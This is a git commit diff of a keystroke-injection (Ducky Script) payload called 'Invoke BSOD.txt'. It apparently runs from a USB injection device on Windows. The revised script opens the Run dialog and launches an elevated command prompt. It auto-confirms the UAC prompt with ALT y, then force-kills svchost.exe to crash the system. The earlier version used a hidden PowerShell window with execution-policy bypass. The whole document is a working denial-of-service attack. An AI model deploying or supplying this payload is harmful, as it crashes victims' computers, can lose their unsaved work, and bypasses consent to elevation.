Update Invoke BSOD.txt

This commit is contained in:
beigeworm
2023-11-29 10:31:32 +00:00
committed by GitHub
parent a4d8179538
commit 890eefb58c
+3 -7
View File
@@ -8,14 +8,10 @@ REM ***This is a dangerous script - Be Careful!!!***
REM some setup for dukie script. REM some setup for dukie script.
DEFAULT_DELAY 100 DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window) DELAY 1000
GUI r GUI r
DELAY 750 DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass STRING cmd /c taskkill /f /im svchost.exe
CTRL-SHIFT ENTER CTRL-SHIFT ENTER
DELAY 1500 DELAY 2500
ALT y ALT y
DELAY 5000
STRING taskkill /f /im svchost.exe
ENTER